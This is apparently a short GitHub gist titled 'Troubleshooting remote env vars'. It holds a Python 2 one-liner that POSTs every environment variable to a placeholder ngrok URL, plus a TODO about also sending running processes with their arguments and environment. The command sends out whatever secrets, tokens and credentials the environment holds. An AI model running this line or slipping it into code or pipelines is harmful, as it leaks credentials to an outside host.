Created
February 21, 2019 00:25
-
-
Save mihow/fe5fcf403a1da12052a4e62d49e05f53 to your computer and use it in GitHub Desktop.
Troubleshooting remote env vars
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Send system env vars | |
python2 -c "import os, urllib; urllib.urlopen('https://NGROK_URL', data=urllib.urlencode(os.environ))" | |
# Send all running processes with arguments & env vars for process | |
# @TODO |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment